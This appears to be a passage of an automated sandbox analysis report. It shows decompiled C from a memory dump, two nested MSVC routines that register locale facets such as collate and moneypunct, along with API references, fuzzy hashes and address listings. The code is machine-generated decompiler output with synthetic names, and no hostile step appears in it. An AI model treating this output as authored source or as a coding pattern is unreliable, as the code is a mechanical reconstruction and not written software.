int.LIBCPMT ref: 6DDEB774

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDEB797
std::_Facet_Register.LIBCPMT ref: 6DDEB7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB7EC

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: c25cf387a35fb1281ff7580db683fcf72d4d06fc93d2c9f94c3030d538eb0f34
Instruction ID: c68fa22ac923e395c933a7d78cf59c5f2ce7efb9c90f6a9c99e934996a84f3eb
Opcode Fuzzy Hash: c25cf387a35fb1281ff7580db683fcf72d4d06fc93d2c9f94c3030d538eb0f34
Instruction Fuzzy Hash: F211A37680822DDBCF01FB64C880ABEB7B5AF44714F270409F515AB390DF74AA058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t506 - 0x14, 0);
				_t483 =  *0x6de96df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6DDB161C(0x6de96da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6DDD66BA(_t506 - 0x14);
					return E6DDF0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6DDE11AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t506 - 0x20);
							E6DDF3D74(_t506 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t471, _t483, 0x14);
							E6DDD6653(_t506 - 0x14, 0);
							_t484 =  *0x6de96dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6DDB161C(0x6de96d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6DDD66BA(_t506 - 0x14);
								return E6DDF0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6DDE1230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t506 - 0x20);
										E6DDF3D74(_t506 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t358, _t472, _t484, 0x14);
										E6DDD6653(_t506 - 0x14, 0);
										_t485 =  *0x6de96dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6DDB161C(0x6de96d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6DDD66BA(_t506 - 0x14);
											return E6DDF0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6DDE12B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t506 - 0x20);
													E6DDF3D74(_t506 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t358, _t473, _t485, 0x14);
													E6DDD6653(_t506 - 0x14, 0);
													_t486 =  *0x6de96dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6DDB161C(0x6de96d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6DDD66BA(_t506 - 0x14);
														return E6DDF0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6DDE1339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t506 - 0x20);
																E6DDF3D74(_t506 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t358, _t474, _t486, 0x14);
																E6DDD6653(_t506 - 0x14, 0);
																_t487 =  *0x6de96db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6DDB161C(0x6de96d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6DDD66BA(_t506 - 0x14);
																	return E6DDF0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6DDE13A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t506 - 0x20);
																			E6DDF3D74(_t506 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t358, _t475, _t487, 0x14);
																			E6DDD6653(_t506 - 0x14, 0);
																			_t488 =  *0x6de96ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6DDB161C(0x6de96d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6DDD66BA(_t506 - 0x14);
																				return E6DDF0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6DDE1409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t506 - 0x20);
																						E6DDF3D74(_t506 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t358, _t476, _t488, 0x14);
																						E6DDD6653(_t506 - 0x14, 0);
																						_t489 =  *0x6de96de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6DDB161C(0x6de96d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6DDD66BA(_t506 - 0x14);
																							return E6DDF0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6DDE1471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t506 - 0x20);
																									E6DDF3D74(_t506 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t358, _t477, _t489, 0x14);
																									E6DDD6653(_t506 - 0x14, 0);
																									_t490 =  *0x6de96dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6DDB161C(0x6de96da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6DDD66BA(_t506 - 0x14);
																										return E6DDF0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6DDE14EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t506 - 0x20);
																												E6DDF3D74(_t506 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t358, _t478, _t490, 0x14);
																												E6DDD6653(_t506 - 0x14, 0);
																												_t491 =  *0x6de96dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6DDB161C(0x6de96d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6DDD66BA(_t506 - 0x14);
																													return E6DDF0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6DDE1558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t506 - 0x20);
																															E6DDF3D74(_t506 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t358, _t479, _t491, 0x14);
																															E6DDD6653(_t506 - 0x14, 0);
																															_t492 =  *0x6de96e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6DDB161C(0x6de96dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6DDD66BA(_t506 - 0x14);
																																return E6DDF0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6DDE15C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t506 - 0x20);
																																		E6DDF3D74(_t506 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t358, _t480, _t492, 0x14);
																																		E6DDD6653(_t506 - 0x14, 0);
																																		_t493 =  *0x6de96dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6DDB161C(0x6de96d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6DDB171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6DDD66BA(_t506 - 0x14);
																																			return E6DDF0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6DDE162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6DDB1438(_t435);
																																					E6DDF3D74(_t506 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de3851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6de3c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6DDE542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6DDF0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t481);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6de96dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t480);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6de96e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6DDD6FD3(__eflags, _t479);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6de96dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6DDD6FD3(__eflags, _t478);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6de96dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6DDD6FD3(__eflags, _t477);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6de96de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6DDD6FD3(__eflags, _t476);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6de96ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6DDD6FD3(__eflags, _t475);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6de96db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6DDD6FD3(__eflags, _t474);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6de96dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6DDD6FD3(__eflags, _t473);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6de96dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6DDD6FD3(__eflags, _t472);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6de96dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6DDD6FD3(__eflags, _t471);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6de96df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

0x6dddf60d
0x6dddf60d
0x6dddf614
0x6dddf61e
0x6dddf623
0x6dddf62e
0x6dddf632
0x6dddf635
0x6dddf63a
0x6dddf63e
0x6dddf643
0x6dddf647
0x6dddf68c
0x6dddf68f
0x6dddf69b
0x6dddf649
0x6dddf64b
0x6dddf651
0x6dddf657
0x6dddf65f
0x6dddf662
0x6dddf69f
0x6dddf6ad
0x6dddf6b2
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e9
0x6dddf6eb
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b

APIs

__EH_prolog3.LIBCMT ref: 6DDDF614
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF61E
int.LIBCPMT ref: 6DDDF635

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF658
std::_Facet_Register.LIBCPMT ref: 6DDDF66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF6AD

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 1b99e08f42c1a4b38d706e7ac49eb884830fab4ed2ee012bb73322903b53fabd
Instruction ID: 602ef580a4b8db3b586205e244ce8c8c676d56bf65174133b35bdfaca1598f52
Opcode Fuzzy Hash: 1b99e08f42c1a4b38d706e7ac49eb884830fab4ed2ee012bb73322903b53fabd
Instruction Fuzzy Hash: B911C2B5908119DBCF05FB64C840BFDB7B4AF94718F27041AF521AB291DF7499018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t814 - 0x14, 0);
				_t777 =  *0x6de96de8; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6DDB161C(0x6de96d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6DDD66BA(_t814 - 0x14);
					return E6DDF0075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6DDE0EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t814 - 0x20);
							E6DDF3D74(_t814 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t758, _t777, 0x14);
							E6DDD6653(_t814 - 0x14, 0);
